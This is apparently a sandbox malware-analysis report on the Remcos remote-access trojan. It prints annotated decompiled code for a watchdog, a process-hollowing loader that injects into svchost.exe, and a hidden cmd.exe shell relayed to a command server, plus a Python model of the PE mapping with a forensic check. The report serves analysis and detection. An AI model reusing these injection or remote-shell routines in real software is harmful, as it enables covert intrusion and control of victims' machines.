                                    							_t35 = E006D427F(0x73c518,  &_v76, L"\\SysWOW64");
                                    							E006D1EFA( &_v132, _t37, _t142, E006D3030( &_v36, E006D427F(0x73c518,  &_v56, E0070987F(0x73c518,  &_v76, __eflags, L"WinDir")), _t35));
                                    							E006D1EF0();
                                    							E006D1EF0();
                                    						} else {
                                    							_t61 = E006D427F(0x73c518,  &_v28, L"\\system32");
                                    							E006D1EFA( &_v132, _t63, _t142, E006D3030( &_v84, E006D427F(0x73c518,  &_v56, E0070987F(0x73c518,  &_v28, __eflags, L"WinDir")), _t61));
                                    							E006D1EF0();
                                    							E006D1EF0();
                                    						}
                                    						E006D1EF0();
                                    						E006D766C(0x73c518,  &_v124, 0, L"\\svchost.exe");
                                    						_t143 = E006D1F95( &_v104);
                                    						_t46 = E006E412B(E006D1EEB( &_v128), _t143, 0x73bd50);
                                    						_t150 = _t149 - 0x18;
                                    						_t107 = _t149 - 0x18;
                                    						__eflags = _t46;
                                    						if(_t46 != 0) {
                                    							E006D2084(0x73c518, _t107, "Watchdog module activated");
                                    							E006D2084(0x73c518, _t150 - 0x18, "[Info]");
                                    							E006E6C80(0x73c518, 0);
                                    							Sleep(0x7d0);
                                    							_t112 =  *0x73bd58; // 0x0
                                    							goto L13;
                                    						}
                                    						E006D2084(0x73c518, _t107, "Watchdog launch failed!");
                                    						E006D2084(0x73c518, _t150 - 0x18, "[ERROR]");
                                    						E006E6C80(0x73c518, 0);
                                    						CloseHandle( *0x73bd60);
                                    						E006D1EF0();
                                    						E006D1FC7();
                                    						_push(3);
                                    						_pop(1);
                                    					} else {
                                    						CloseHandle(_t29);
                                    						_t155 = _t149 - 0x18;
                                    						E006D2084(0x73c518, _t155, "Remcos restarted by watchdog!");
                                    						_t156 = _t155 - 0x18;
                                    						E006D2084(0x73c518, _t155 - 0x18, "[Info]");
                                    						E006E6C80(0x73c518, 0);
                                    						E006D2084(0x73c518, _t156 + 0x18, "Watchdog module activated");
                                    						E006D2084(0x73c518, _t156 + 0x18 - 0x18, "[Info]");
                                    						E006E6C80(0x73c518, 0);
                                    						CreateThread(0, 0, E006E00F9, 0, 0, 0);
                                    						_t143 = "WDH";
                                    						_t78 = E006E0885(E006D1F95(0x73c518), _t143,  &_v148);
                                    						__eflags = _t78;
                                    						if(_t78 == 0) {
                                    							goto L1;
                                    						} else {
                                    							 *0x73bd50 = OpenProcess(0x1fffff, 0, _v132);
                                    							E006E0CE2(E006D1F95(0x73c518), __eflags, _t143);
                                    							_t112 = _v132;
                                    							L13:
                                    							L14();
                                    							asm("int3");
                                    							_push(_t143);
                                    							_push(0);
                                    							_t141 = _t112;
                                    							L15:
                                    							_t145 = OpenProcess(0x100000, 0, _t141);
                                    							WaitForSingleObject(_t145, 0xffffffff);
                                    							CloseHandle(_t145);
                                    							__eflags =  *0x73bd4e;
                                    							if(__eflags != 0) {
                                    								E006DFAC7(__eflags, 0);
                                    							}
                                    							goto L15;
                                    						}
                                    						L17:
                                    					}
                                    				} else {
                                    					L1:
                                    				}
                                    				return 1;
                                    				goto L17;
			}

                                    0x006dfacd
                                    0x006dfad1
                                    0x006dfad3
                                    0x006dfaf6
                                    0x006dfb0d
                                    0x006dfb13
                                    0x006dfb15
                                    0x006dfba4
                                    0x006dfbb9
                                    0x006dfbc2
                                    0x006dfbcc
                                    0x006dfbce
                                    0x006dfc2b
                                    0x006dfc57
                                    0x006dfc60
                                    0x006dfc69
                                    0x006dfbd0
                                    0x006dfbd9
                                    0x006dfc05
                                    0x006dfc0e
                                    0x006dfc17
                                    0x006dfc1c
                                    0x006dfc72
                                    0x006dfc80
                                    0x006dfc97
                                    0x006dfca2
                                    0x006dfca8
                                    0x006dfcab
                                    0x006dfcad
                                    0x006dfcaf
                                    0x006dfcb6
                                    0x006dfcc5
                                    0x006dfcca
                                    0x006dfcd7
                                    0x006dfcdd
                                    0x00000000
                                    0x006dfcdd
                                    0x006dfcea
                                    0x006dfcf9
                                    0x006dfcfe
                                    0x006dfd0c
                                    0x006dfd16
                                    0x006dfd1f
                                    0x006dfd24
                                    0x006dfd26
                                    0x006dfb1b
                                    0x006dfb1c
                                    0x006dfb22
                                    0x006dfb2c
                                    0x006dfb31
                                    0x006dfb3c
                                    0x006dfb41
                                    0x006dfb50
                                    0x006dfb5b
                                    0x006dfb60
                                    0x006dfb72
                                    0x006dfb7c
                                    0x006dfb8c
                                    0x006dfb93
                                    0x006dfb95
                                    0x00000000
                                    0x006dfb9b
                                    0x006dfd43
                                    0x006dfd4f
                                    0x006dfd55
                                    0x006dfd59
                                    0x006dfd59
                                    0x006dfd5e
                                    0x006dfd5f
                                    0x006dfd60
                                    0x006dfd61
                                    0x006dfd63
                                    0x006dfd71
                                    0x006dfd76
                                    0x006dfd7d
                                    0x006dfd83
                                    0x006dfd8a
                                    0x006dfd8e
                                    0x006dfd8e
                                    0x00000000
                                    0x006dfd8a
                                    0x00000000
                                    0x006dfb95
                                    0x006dfaf8
                                    0x006dfaf8
                                    0x006dfafa
                                    0x006dfd2d
                                    0x00000000

                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 006DFAD3
                                      • Part of subcall function 006E0BB0: RegCreateKeyA.ADVAPI32(80000001,00000000,0072F6BC), ref: 006E0BBE
                                      • Part of subcall function 006E0BB0: RegSetValueExA.ADVAPI32(0072F6BC,000000AF,00000000,00000004,00000001,00000004,?,?,?,006DA669,0072FEF8,00000001,000000AF,0072F6BC), ref: 006E0BD9
                                      • Part of subcall function 006E0BB0: RegCloseKey.ADVAPI32(0072F6BC,?,?,?,006DA669,0072FEF8,00000001,000000AF,0072F6BC), ref: 006E0BE4
                                    • OpenMutexA.KERNEL32 ref: 006DFB0D
                                    • CloseHandle.KERNEL32(00000000), ref: 006DFB1C
                                    • CreateThread.KERNEL32 ref: 006DFB72
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 006DFD3A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
• Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                    • String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
                                    • API String ID: 3018269243-3797382479
                                    • Opcode ID: 9fa9a3350b7a76c9ecaf69b7b7bb648a7d4732f3f09900eb378e9d6b846fd5ea
                                    • Instruction ID: 66e310589d87d50dd6374201b723d7605c4b2fb895153f54a053407363e0d190
                                    • Opcode Fuzzy Hash: 9fa9a3350b7a76c9ecaf69b7b7bb648a7d4732f3f09900eb378e9d6b846fd5ea
                                    • Instruction Fuzzy Hash: C4513531E04241ABD658BB70DC57C6F73A79EA2710F50042FF802563E3EFB49A05C6AA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
            // Left column: address of the instruction(s) decompiled into that statement;
            // 0x00000000 marks a decompiler-generated label, jump or return with no instruction of its own.
            //
            // Process hollowing (RunPE): a payload PE held in memory (__edx) is written over a freshly
            // created, suspended host process started from the path in __ecx (per this module's string
            // table: %WinDir%\SysWOW64\svchost.exe or %WinDir%\system32\svchost.exe). PE32 only; the
            // offsets below are 32-bit IMAGE_NT_HEADERS offsets.
            E006E412B(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
                void _v8;                       // remote PEB->ImageBaseAddress
                signed int _v12;                // section index
                void* _v16;                     // payload buffer, later the section-header cursor
                CONTEXT* _v20;
                WCHAR* _v24;                    // host path, later the remote allocation base
                struct _STARTUPINFOW _v92;
                void* __edi;
                void* _t58;
                void _t72;
                void* _t73;
                int _t83;
                intOrPtr* _t95;                 // payload IMAGE_NT_HEADERS32
                void* _t98;
                signed int _t102;
                void* _t104;
                void* _t106;
                CONTEXT* _t110;
                void* _t113;
                CONTEXT* _t114;
                struct _PROCESS_INFORMATION* _t116;

0x006e4131      _v8 = _v8 & 0x00000000;
0x006e413a      _v16 = __edx;
0x006e413d      _v24 = __ecx;
                // Sanity-check the payload: 'MZ' at offset 0, 'PE\0\0' at e_lfanew (+0x3c).
0x006e4143      if( *__edx == 0x5a4d) {
0x006e4150          _t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
0x006e4158          if( *_t95 == 0x4550) {
0x006e4162              _push(_t106);
0x006e416b              E00701F00(_t106,  &_v92, 0, 0x44);                  // memset(&si, 0, sizeof(STARTUPINFOW))
0x006e4170              _t116 = _a4;
0x006e417a              asm("stosd");                                        // zero the 16-byte PROCESS_INFORMATION
0x006e417c              asm("stosd");
0x006e417d              asm("stosd");
0x006e417e              asm("stosd");
                        // dwCreationFlags = 4 = CREATE_SUSPENDED: the host's initial thread never runs its own image.
0x006e4198              if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
0x006e4322                  L21:
0x006e4322                  _t58 = 0;
0x006e4324                  L22:
0x006e4326                  L23:
0x00000000                  return _t58;
0x006e4326              }
                        // si was zeroed above, so these close NULL handles and do nothing.
0x006e41a7              CloseHandle(_v92.hStdInput);
0x006e41ac              CloseHandle(_v92.hStdOutput);
0x006e41b1              CloseHandle(_v92.hStdError);
                        // Requests only 4 bytes for a 0x2cc-byte x86 CONTEXT; this works solely because
                        // VirtualAlloc commits whole pages (MEM_COMMIT, PAGE_READWRITE).
0x006e41c4              _t110 = VirtualAlloc(0, 4, 0x1000, 4);
0x006e41c7              _v20 = _t110;
0x006e41ca              _t110->ContextFlags = 0x10007;                      // CONTEXT_FULL
0x006e41d0              _t14 =  &(_t116->hThread); // 0xffffdcf2
                        // In a suspended x86 process the initial thread's EBX holds the PEB address;
                        // PEB+8 is ImageBaseAddress, read into _v8.
0x006e41db              if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
0x006e4301                  L20:
                            // Common failure path: kill the half-built host and release its handles.
0x006e4305                  TerminateProcess(_t116->hProcess, 0);
0x006e4313                  CloseHandle(_t116->hProcess);
0x006e4315                  _t50 =  &(_t116->hThread); // 0xffffdcf2
0x006e4318                  CloseHandle( *_t50);
0x006e431e                  asm("stosd");
0x006e431f                  asm("stosd");
0x006e4320                  asm("stosd");
0x006e4321                  asm("stosd");
0x00000000                  goto L21;
0x006e4203              } else {
0x006e4203                  _t72 = _v8;
                            // If the host image already sits at the payload's preferred ImageBase (+0x34), the
                            // function pointer at 0x73bd24 is called with (hProcess, base) to free that range.
                            // The report does not resolve that pointer; in RunPE loaders this slot is normally
                            // NtUnmapViewOfSection, which takes exactly these two arguments.
0x006e4209                  if(_t72 ==  *(_t95 + 0x34)) {
0x006e420e                       *0x73bd24(_t116->hProcess, _t72);
0x006e420e                  }
                            // Allocate SizeOfImage (+0x50) bytes at the preferred ImageBase, MEM_COMMIT|MEM_RESERVE,
                            // PAGE_EXECUTE_READWRITE. There is no relocation fallback: if that range is not free
                            // in the host, the injection fails and the host is terminated (L20).
0x006e4223                  _t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
0x006e4229                  _v24 = _t73;
0x006e422e                  if(_t73 == 0) {
0x00000000                      goto L20;
0x006e4234                  } else {
0x006e4234                      _t113 = _v16;
                                // Copy the headers: SizeOfHeaders (+0x54) bytes to the start of the region.
0x006e4248                      if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
0x00000000                          goto L20;
0x00000000                      }
0x006e424e                      _v12 = _v12 & 0x00000000;
                                // NumberOfSections is at IMAGE_FILE_HEADER+2, i.e. NT header + 6.
0x006e4258                      if(0 >=  *(_t95 + 6)) {
0x006e42a2                          L14:
0x006e42a5                          _t98 = _t95 + 0x34;
0x006e42a8                          _t114 = _v20;
                                    // Patch PEB->ImageBaseAddress to the payload's base unless it already matches.
0x006e42ad                          if(_v8 ==  *_t98) {
0x006e42d5                              L17:
                                        // For a CREATE_SUSPENDED initial thread EAX is the entry point the loader
                                        // jumps to; redirect it to base + AddressOfEntryPoint (+0x28).
0x006e42dc                              _t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
0x006e42e2                              _t48 =  &(_t116->hThread); // 0xffffdcf2
0x006e42ed                              if(SetThreadContext( *_t48, _t114) == 0) {
0x00000000                                  goto L20;
0x00000000                              }
0x006e42ef                              _t49 =  &(_t116->hThread); // 0xffffdcf2
0x006e42fb                              if(ResumeThread( *_t49) == 0xffffffff) {
0x00000000                                  goto L20;
0x00000000                              }
0x006e42fd                              _t58 = 1;
0x00000000                              goto L22;
0x006e42fd                          }
0x006e42c0                          _t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
0x006e42c8                          if(_t83 != 0) {
0x00000000                              goto L17;
0x00000000                          }
                                    // Unlike L20, this failure path terminates the host but leaks both handles.
0x006e42cd                          TerminateProcess(_t116->hProcess, _t83);
0x00000000                          goto L21;
0x006e42cd                      }
0x006e425a                      _t104 = 0;
0x006e425c                      _v16 = 0;
                                // Section loop. _t28 = &e_lfanew; the section table starts at e_lfanew + 0xf8
                                // (PE32) and each 0x28-byte IMAGE_SECTION_HEADER has VirtualAddress at +0xc,
                                // SizeOfRawData at +0x10 and PointerToRawData at +0x14, hence 0x104/0x108/0x10c.
                                // Each section's raw bytes go to base + VirtualAddress; the return value is ignored.
0x006e425f                      do {
0x006e425f                          _t28 = _t113 + 0x3c; // 0x83ffc983
0x006e4284                          WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
0x006e428d                          _t37 =  &_v16; // 0x6e433b
0x006e4290                          _t102 = _v12 + 1;
0x006e4295                          _t104 =  *_t37 + 0x28;
0x006e4298                          _v12 = _t102;
0x006e429b                          _v16 = _t104;
0x006e429e                      } while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
0x00000000                      goto L14;
0x006e425f                  }
0x006e422e              }
0x006e41db          }
0x006e415a          _t58 = 0;
0x00000000          goto L23;
0x006e415a      }
0x00000000      return 0;
            }

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ;Cn
                                    • API String ID: 0-2787214330
                                    • Opcode ID: d5e6b49f98085535ff9a713e159941a591f27370cf0e1427eae569f1a4ff857c
                                    • Instruction ID: 9c6fec6f9d40ea89296ca2016a94ca72aa2dba2e7eaafc6a523828411ba16141
                                    • Opcode Fuzzy Hash: d5e6b49f98085535ff9a713e159941a591f27370cf0e1427eae569f1a4ff857c
                                    • Instruction Fuzzy Hash: 86517F70601604FFEB209FB6CC45FAABBBAFF44701F148014F644E62A1DB75A951DB64
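The routine above reads a fixed set of PE32 header fields and copies the image section by section into the suspended host. The Python below is an added example, not Joe Sandbox output and not the sample's own code: it re-implements those header reads and the copy loop against a constructed minimal PE32 (build_sample_pe32 is invented for this example and is not a real binary), so the resulting in-memory layout and the new EAX value can be inspected offline. The offsets are the ones E006E412B dereferences; headers_match is the example's own check, not something the sample does.

```python
# Added example: Python model of the PE32 reads and copy loop in E006E412B.
import struct

# Offsets the decompiled routine dereferences (PE32 layout; PE32+ differs).
E_LFANEW = 0x3C
FH_NUMBER_OF_SECTIONS = 0x06      # _t95 + 6
OH_ADDRESS_OF_ENTRY_POINT = 0x28  # _t95 + 0x28
OH_IMAGE_BASE = 0x34              # _t95 + 0x34
OH_SIZE_OF_IMAGE = 0x50           # _t95 + 0x50
OH_SIZE_OF_HEADERS = 0x54         # _t95 + 0x54
SECTION_TABLE = 0xF8              # 4 (signature) + 20 (file header) + 224 (PE32 optional header)
SECTION_HEADER_SIZE = 0x28        # the loop advances _v16 by 0x28 per section


def parse_hollow_fields(buf: bytes) -> dict:
    """Read exactly the fields the hollowing routine uses, rejecting input the
    same way it does ('MZ' at 0, 'PE\\0\\0' at e_lfanew)."""
    if buf[:2] != b"MZ":
        raise ValueError("no MZ signature")
    nt = struct.unpack_from("<I", buf, E_LFANEW)[0]
    if buf[nt:nt + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    n_sections = struct.unpack_from("<H", buf, nt + FH_NUMBER_OF_SECTIONS)[0]
    sections = []
    for i in range(n_sections):
        hdr = nt + SECTION_TABLE + i * SECTION_HEADER_SIZE
        # +0x0C VirtualAddress, +0x10 SizeOfRawData, +0x14 PointerToRawData:
        # the three dwords the loop feeds to WriteProcessMemory (0x104/0x108/0x10c).
        sections.append(struct.unpack_from("<III", buf, hdr + 0x0C))
    return {
        "entry": struct.unpack_from("<I", buf, nt + OH_ADDRESS_OF_ENTRY_POINT)[0],
        "image_base": struct.unpack_from("<I", buf, nt + OH_IMAGE_BASE)[0],
        "size_of_image": struct.unpack_from("<I", buf, nt + OH_SIZE_OF_IMAGE)[0],
        "size_of_headers": struct.unpack_from("<I", buf, nt + OH_SIZE_OF_HEADERS)[0],
        "sections": sections,
    }


def map_like_hollower(buf: bytes):
    """Simulate the remote region: SizeOfImage bytes at the preferred ImageBase,
    headers at offset 0, each section's raw bytes at its VirtualAddress.
    Returns (region, value written into the suspended thread's EAX)."""
    f = parse_hollow_fields(buf)
    region = bytearray(f["size_of_image"])
    region[:f["size_of_headers"]] = buf[:f["size_of_headers"]]
    for va, raw_size, raw_ptr in f["sections"]:
        region[va:va + raw_size] = buf[raw_ptr:raw_ptr + raw_size]
    return region, f["image_base"] + f["entry"]


def headers_match(region: bytes, on_disk: bytes, size: int = 0x200) -> bool:
    """The memory-forensics check a hollowed process fails: the PE header at the
    PEB ImageBase no longer equals the header of the file the process was started from."""
    return bytes(region[:size]) == bytes(on_disk[:size])


def build_sample_pe32(image_base: int = 0x00400000) -> bytes:
    """Constructed minimal PE32 for this example (not a real binary): one .text section."""
    hdr = bytearray(0x200)
    nt = 0x80
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, E_LFANEW, nt)
    hdr[nt:nt + 4] = b"PE\0\0"
    struct.pack_into("<HH", hdr, nt + 4, 0x014C, 1)         # Machine = i386, NumberOfSections = 1
    struct.pack_into("<H", hdr, nt + 0x14, 0xE0)            # SizeOfOptionalHeader
    struct.pack_into("<H", hdr, nt + 0x18, 0x10B)           # PE32 magic
    struct.pack_into("<I", hdr, nt + OH_ADDRESS_OF_ENTRY_POINT, 0x1000)
    struct.pack_into("<I", hdr, nt + OH_IMAGE_BASE, image_base)
    struct.pack_into("<I", hdr, nt + OH_SIZE_OF_IMAGE, 0x2000)
    struct.pack_into("<I", hdr, nt + OH_SIZE_OF_HEADERS, 0x200)
    sec = nt + SECTION_TABLE
    hdr[sec:sec + 8] = b".text\0\0\0"
    # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    struct.pack_into("<IIII", hdr, sec + 8, 0x10, 0x1000, 0x200, 0x200)
    text = b"\xCC" * 0x10 + b"\x00" * (0x200 - 0x10)        # int3 sled standing in for code
    return bytes(hdr) + text
```

Running map_like_hollower on the constructed file gives a 0x2000-byte region whose first 0x200 bytes are the payload's headers and whose bytes at 0x1000 are the .text raw data, with EAX set to 0x00401000; comparing that region's header with a different on-disk header (what the host executable's file would hold) is where a memory scan spots the hollowed svchost.exe.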
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 81%
            // Left column: address of the instruction(s) decompiled into that statement;
            // 0x00000000 marks a decompiler-generated label, jump or return with no instruction of its own.
            //
            // Remote command shell: starts a hidden cmd.exe on two anonymous pipes, then loops,
            // forwarding whatever the shell prints to the C2 and feeding it the commands the C2
            // sends, until the flag byte at 0x73bae3 is cleared. E006D4AA4 is the send() wrapper
            // (see "Part of subcall function 006D4AA4: send.WS2_32" in the API list).
            E006D55EA(char _a4) {
                long _v8;                       // bytes written by the last WriteFile (used to drop the echoed command)
                long _v12;                      // bytes waiting on the stdout pipe (PeekNamedPipe)
                long _v16;                      // bytes read by ReadFile
                char _v40;                      // string object: copy of the last command sent
                char _v64;                      // string object: output chunk to send
                void* __ebx;
                void* __edi;
                void* __esi;
                void* __ebp;
                long _t52;
                void* _t56;
                void* _t66;
                void* _t70;
                void* _t79;
                CHAR* _t80;
                int _t98;
                intOrPtr* _t107;
                intOrPtr _t138;
                signed int _t146;
                signed int _t147;
                long _t151;
                void* _t155;
                intOrPtr* _t156;
                void* _t163;
                void* _t168;
                void* _t175;

0x006d55f3      _t156 = _t155 - 0x3c;
0x006d55f7      _push(_t146);
                // fs:[0x2c] is the TLS array. The two guarded blocks below are MSVC's
                // __Init_thread_header/__Init_thread_footer pattern (see the API list): they construct
                // the function-local static string objects at 0x73dc60 and 0x73dcf0 exactly once and
                // register their destructors via __onexit.
0x006d55f9      _t138 =  *((intOrPtr*)( *[fs:0x2c]));
0x006d55fb      _t147 = _t146 | 0xffffffff;
0x006d5603      _t98 = 0;
0x006d560b      if( *0x73dce8 >  *((intOrPtr*)(_t138 + 4))) {
0x006d5612          E006FF114(0x73dce8);
0x006d5618          _t160 =  *0x73dce8 - _t147;
0x006d561e          if( *0x73dce8 == _t147) {
0x006d5626              E006D484E(0, 0x73dc60, 0);
0x006d5630              E006FF49E(_t160, E007227B3);
0x006d5635               *_t156 = 0x73dce8;
0x006d563c              E006FF0D5(_t147);
0x006d5641          }
0x006d561e      }
0x006d564d      if( *0x73dcc8 >  *((intOrPtr*)(_t138 + 4))) {
0x006d5655          E006FF114(0x73dcc8);
0x006d565b          _t162 =  *0x73dcc8 - _t147;
0x006d5661          if( *0x73dcc8 == _t147) {
0x006d5668              E006D20D5(_t98, 0x73dcf0);
0x006d5672              E006FF49E(_t162, E007227A9);
0x006d5679              E006FF0D5(_t147, 0x73dcc8);
0x006d567e          }
0x006d5661      }
0x006d567f      _t100 =  &_v40;
0x006d5682      E006D20D5(_t98,  &_v40);
0x006d5687      _t139 = 0x73c2d0;                    // string object: the shell command line, later each pending command
0x006d568c      _v8 = _t98;
                // 0x73bae2 is the "shell process is running" flag; zero means this call has to create it.
0x006d568f      _t163 =  *0x73bae2 - _t98; // 0x0
0x006d5695      if(_t163 != 0) {
0x006d580b          L12:
                    // One loop iteration: ask how many bytes the shell has written to its stdout pipe.
0x006d580f          _v12 = _t98;
0x006d581c          PeekNamedPipe( *0x73dcd0, _t98, _t98, _t98,  &_v12, _t98);
0x006d5825          if(_v12 <= _t98) {
                        // Nothing to read: still send a 0x62 packet, built from the constant at 0x72f6bc
                        // (the same constant used below to reset the command buffer, so presumably empty).
0x006d58c7              _t156 = _t156 - 0x18;
0x006d58d1              E006D2084(_t98, _t156, 0x72f6bc);
0x006d58d6              _push(0x62);
0x006d58e2              _t147 = E006D4AA4(_t98, 0x73dc60, _t136, __eflags);
0x00000000              goto L21;
0x006d58e2          }
0x006d582b          _push(_v12);
0x006d582e          _t56 = E007094F6(_t100);             // allocate a read buffer of _v12 bytes
0x006d5835          _t140 = _t56;
0x006d5845          ReadFile( *0x73dcd0, _t56, _v12,  &_v16, _t98);
0x006d584e          if(_v16 <= _t98) {
0x006d58b9              L19:
0x006d58ba              L007094F1(_t140);                 // free the read buffer
0x006d58c0              _t139 = 0x73c2d0;
0x00000000              goto L21;
0x006d58c0          }
                    // cmd.exe echoes a command line it reads from a redirected stdin. If the last WriteFile
                    // wrote _v8 bytes and the output begins with that command (E00709510 compares _v8 bytes
                    // against the saved copy in _v40 and returns 0 on a match), only the remainder
                    // (_v16 - _v8 bytes from offset _v8) is sent; otherwise the whole buffer goes out.
0x006d5853          if(_v8 <= _t98) {
0x006d5888              L17:
0x006d588c              E006D2084(_t98,  &_v64, _t140);
0x006d5891              _t156 = _t156 - 0x18;
0x006d5894              _t107 = _t156;
0x006d5896              _push(_v16);
0x006d5899              _push(_t98);
0x006d589a              L18:
0x006d589e              E006D5A14(_t98, _t107, _t136, _t172);
0x006d58b2              _t147 = E006D4AA4(_t98, 0x73dc60, _t136, _t172, 0x62,  &_v64);
0x006d58b4              E006D1FC7();
0x00000000              goto L19;
0x006d58b4          }
0x006d5862          _t66 = E00709510(_t140, E006D1F95( &_v40), _v8);
0x006d5867          _t156 = _t156 + 0xc;
0x006d586a          _t172 = _t66;
0x006d586c          if(_t66 != 0) {
0x00000000              goto L17;
0x00000000          }
0x006d5872          E006D2084(_t98,  &_v64, _t140);
0x006d587d          _t156 = _t156 - 0x18;
0x006d5880          _t107 = _t156;
0x006d5882          _push(_v16 - _v8);
0x006d5883          _push(_v8);
0x00000000          goto L18;
0x006d569b      } else {
0x006d569b          _t136 = "cmd.exe";
0x006d56a2          _t70 = E006D5A6F("cmd.exe");          // unresolved helper; a zero result aborts the setup
0x006d56a7          _t164 = _t70;
0x006d56a9          if(_t70 == 0) {
0x006d5982              L26:
                        // Teardown: close the stdout pipe's read and write ends and clear the running flag.
0x006d5987              E006D4E0B(0x73dc60);
0x006d5992              CloseHandle( *0x73dcd0);
0x006d599e              CloseHandle( *0x73dcec);
0x006d59a4               *0x73bae2 = _t98;
0x006d59aa              _t98 = 1;
0x006d59ac              L27:
0x006d59af              E006D1FC7();
0x006d59b7              E006D1FC7();
0x006d59c4              return _t98;
0x006d59c4          }
                    // Working directory for the shell: %SystemDrive%\ (string object at 0x73dcf0).
0x006d56c2          E006D5A0B(_t98, 0x73dcf0, E0070988A(_t98, _t164, "SystemDrive"));
0x006d56ce          E006D5A02(_t98, 0x73dcf0, 0x73c2d0, "\\");
                    // SECURITY_ATTRIBUTES at 0x73dc08: nLength = 12, bInheritHandle = 1, so the child inherits
                    // the pipe ends. Pipe 1 (0x73dce4 read / 0x73dccc write) becomes the shell's stdin;
                    // pipe 2 (0x73dcd0 read / 0x73dcec write) its stdout and stderr.
0x006d56ea          0x73dc08->nLength = 0xc;
0x006d56f4           *0x73dc10 = 1;
0x006d56fe           *0x73dc0c = _t98;
0x006d5708          if(CreatePipe(0x73dce4, 0x73dccc, 0x73dc08, _t98) == 0 || CreatePipe(0x73dcd0, 0x73dcec, 0x73dc08, _t98) == 0) {
0x00000000              goto L27;
0x006d5724          } else {
                        // STARTUPINFOA at 0x73dc18: cb = 0x44, dwFlags = 0x101 = STARTF_USESTDHANDLES |
                        // STARTF_USESHOWWINDOW, wShowWindow = 0 (SW_HIDE), hStdInput = pipe 1 read end,
                        // hStdOutput = hStdError = pipe 2 write end.
0x006d5726              _t151 = 0x44;
0x006d572f              E00701F00(0x73dc18, 0x73dc18, _t98, CreatePipe);
0x006d5737              0x73dc18->cb = _t151;
0x006d573f               *0x73dc44 = 0x101;
0x006d5749               *0x73dc48 = 0;
0x006d575e               *0x73dc50 =  *0x73dce4;
0x006d5763              _t79 =  *0x73dcec;
0x006d5769               *0x73dc54 = _t79;
0x006d576e               *0x73dc58 = _t79;
0x006d5773              _t80 = E006D1F95(0x73dcf0);
                        // bInheritHandles = 1, no creation flags, lpCurrentDirectory = %SystemDrive%\, PROCESS_INFORMATION
                        // at 0x73dcd4. This is the only CreateProcessA call (ref 006D578D); the later appearances of
                        // "CreateProcessA(...)" as an argument are the decompiler carrying this call's flags result,
                        // not further process creations.
0x006d579c               *0x73bae2 = CreateProcessA(_t98, E006D1F95(0x73c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x73dc18, 0x73dcd4) != 0;
0x006d57a3              E006D5A0B(_t98, 0x73c2d0, 0x72f6bc);   // reset the command buffer
0x006d57ad               *0x73bae3 = 1;                          // shell-active flag; the loop below runs while it is nonzero
0x006d57b4              E006D498B(0x73dc60);
0x006d57c3              asm("movsd");
0x006d57c4              asm("movsd");
0x006d57c5              asm("movsd");
0x006d57c6              asm("movsd");
0x006d57ce              E006D4A08("cmd.exe");
0x006d57d3              _t156 = _t156 + 0xc - 0xfffffffffffffff8;
0x006d57dc              E006D20EC(_t98, _t156, "cmd.exe", CreateProcessA(_t98, E006D1F95(0x73c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x73dc18, 0x73dcd4),  &_a4);
0x006d57e1              _push(0x93);                             // "shell started" packet to the C2
0x006d57e6              _t100 = 0x73dc60;
0x006d57f2              _t147 = E006D4AA4(_t98, 0x73dc60, "cmd.exe", CreateProcessA(_t98, E006D1F95(0x73c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x73dc18, 0x73dcd4));
0x006d57f4              Sleep(0x12c);                            // 300 ms for cmd.exe to come up
0x006d57fa              _t168 =  *0x73bae2 - _t98; // 0x0
0x006d5800              if(_t168 == 0) {
0x00000000                  goto L26;
0x00000000              }
0x006d5806              _t139 = 0x73c2d0;
0x006d580b              do {
0x00000000                  goto L12;
0x006d58e4                  L21:
                            // Loop tail: if the C2 has queued a command in the buffer at 0x73c2d0 (E006D2489
                            // appears to return its length, E006D1F95 its C string), append "\n", WriteFile it to
                            // the shell's stdin, keep a copy in _v40 for the echo check above and clear the buffer;
                            // then sleep 100 ms and repeat while the flag at 0x73bae3 is set. The two ternaries
                            // are decompiler output whose condition was lost.
0x006d58ef                  _t38 =  <=  ? 0 :  *0x73bae3 & 0x000000ff;
0x006d58f2                  _t100 = _t139;
0x006d58f4                   *0x73bae3 =  <=  ? 0 :  *0x73bae3 & 0x000000ff;
0x006d5900                  if(E006D2489() == 0) {
0x006d5946                      _v8 = _t98;
0x006d5902                  } else {
